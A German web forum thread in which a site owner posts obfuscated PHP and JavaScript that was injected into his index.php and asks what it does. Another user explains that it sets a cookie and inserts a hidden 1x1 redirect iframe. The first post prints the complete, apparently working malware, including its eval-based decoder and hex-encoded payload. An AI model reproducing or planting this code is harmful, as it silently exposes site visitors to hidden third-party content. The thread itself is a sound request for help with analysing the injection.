Hallo zusammen!

Ich weiß nicht ob sich hier jemand mit dem Thema auskennt. Vor kurzem wurde auf einer meiner Webseiten folgendes eingeschleust:

Code: Alles auswählenAufklappen

ATTFilter

#0f2490#
if(empty($tqz)) {$tqz = "<script type=\"text/javascript\" language=\"javascript\" >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_75_86_7f_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_75_86_7f_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_75_86_7f_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_51_58_60_66_60_61_52_5a_3b_72_80_3c_76_7a_6e_74_72_7b_72_80_3c_55_4f_66_45_58_7e_40_81_3b_7d_75_7d_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_75_86_7f_69_34_2d_70_79_6e_80_80_4a_69_34_75_86_7f_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_75_86_7f_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_75_86_7f_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>";echo $tqz;}
#/0f2490#
         

Die Einschleusung habe ich in der "index.php" gefunden, ganz unten nach dem letzten "</html>"-Tag. Die Webseite habe ich ohne CMS entwickelt und ist ganz einfach gebaut. (Keine Formulare / user-inputs.. nur Text und Bilder auf mehrere Seiten. PHP wird nur verwendet um die Inhalte von dem Layout getrennt zu halten)

Mich würde interessieren ob jemand diesen Code schon mal gesehen hat, und weiß was es bewirkt? Ich kenne mich zwar mit JS aus, aber das hier ist mir definitiv zu kryptisch..

Übrigens: wenn man z.Bsp. nach "if(empty($tqz))" googelt, findet man jede menge Seiten die auch mit einem ähnlichen Code befallen sind.

Viele Grüße,
IL

Dieser Code ist Obfuscated. Dies bedeutet, dass man im Anfangs-Zustand nicht wirklich sieht, was der Code wirklich tut. Um ihn wieder verständlich zu machen muss man ihn Deobfuscaten.

Nach dem ich den Code Deobfuscated habe, sehe ich was er wirklich macht. Der Code schaut nach einem Cookie. Falls dieser Cookie nicht gesetzt ist, setzt der Code diesen 1 Tag haltbaren Cookie und fügt einen 1x1 px großen iframe auf der Seite ein.

Hi mort,

Vielen Dank für die schnelle Antwort!

Konntest du auch die URL des iframes rauskriegen?

Ich habe zum Thema "deobfuscating / JS" etwas gegoogelt, und auch einige online-Deobfuscatoren gefunden - jedoch konnte ich damit den Code nicht wirklich lesbar machen. Was hast du verwendet?

Danke & Grüße,
IL

Zitat:

Konntest du auch die URL des iframes rauskriegen?

Ich kann dir leider aus Sicherheitsgründen keinen Link zur Seite geben. Aber in meinem Fall will die Seite mich auf eine andere weiterleiten.
Hier habe ich eine Web of Trust Bewertung der Seite auf die ich weitergeleitet werden soll.
-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)

Zitat:

Was hast du verwendet?

Ich mach das per Hand. Der eigentliche Code ist "verschlüsselt" in einer Variable. Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".

Zitat:

Zitat von mort

-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)

da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.

Zitat:

Zitat von mort

(..) Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".

Ich glaube ich komme auch langsam dahinter. Der Code beginnt mit dem Algorithmus der die Zeichenkette "z" entschlüsselt. Dann ist es auch klar, dass es per Online-Generator nicht geht..


Vielen Dank für deine Hilfe und für die Tipps!

Zitat:

da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.

Das ist sie auch. Sie haben diese redirects auf ihre Website bei malekal auch bemerkt: [en] Reveton go now by hacked website | malekal's site
Und vermuten:

Someone is probably trying to get the site blacklisted or to get bad reputation.